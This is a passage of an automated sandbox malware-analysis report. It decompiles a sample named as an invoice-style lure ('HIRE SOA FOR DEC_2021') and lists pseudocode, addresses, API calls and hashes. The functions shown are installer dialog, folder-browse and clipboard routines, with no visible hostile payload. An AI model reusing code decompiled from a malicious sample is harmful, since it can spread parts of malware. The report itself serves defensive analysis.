				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x00405114
0x00405138
0x00405138
0x0040514b
0x00405169
0x00405170
0x004051c7
0x004051cb
0x00000000
0x004051d2
0x004051da
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x0040520c
0x00405221
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x004051cb
0x00405178
0x004051a8
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(?,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32(00000001,00000000), ref: 004052D2
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a0f
0x00404a1d
0x00404a20
0x00404a36
0x00404aae
0x00404ab1
0x00404ab3
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad7
0x00404add
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a3b
0x00404a46
0x00404a4b
0x00404a52
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a6c
0x00404a71
0x00404a87
0x00404a73
0x00404a73
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a9b
0x00404a9c
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b98
0x00404b9a
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bd3
0x00404d20
0x00404d27
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00000000
0x00404bd9
0x00404bdb
0x00404be3
0x00404be7
0x00404be7
0x00404bef
0x00404c30
0x00404c32
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404d0a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c68
0x00404c6a
0x00404c6c
0x00404c72
0x00404c79
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c8f
0x00404c9b
0x00404c9f
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00000000
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c12
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b10
0x00000000
0x00404b26
0x00404b30
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b4c
0x00404b58
0x00404b58
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b10
0x004047c6
0x004047cb
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32 ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32 ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

M, xrefs: 00404922
, xrefs: 00404D34
N, xrefs: 00404A06

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

